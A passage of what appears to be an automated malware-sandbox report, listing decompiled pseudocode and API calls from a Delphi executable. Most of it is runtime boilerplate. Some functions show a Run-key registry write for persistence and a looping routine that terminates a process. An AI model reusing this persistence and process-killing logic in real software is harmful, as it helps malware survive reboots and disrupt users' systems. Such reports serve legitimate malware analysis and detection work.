      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep(0x4e20); // 20000 ms, per the Sleep.KERNEL32(00004E20, ...) entry in the API list for this function
    				goto L2;
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep(0x4e20); // 20000 ms, per the Sleep.KERNEL32(00004E20, ...) entry in the API list for this function
    				}
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
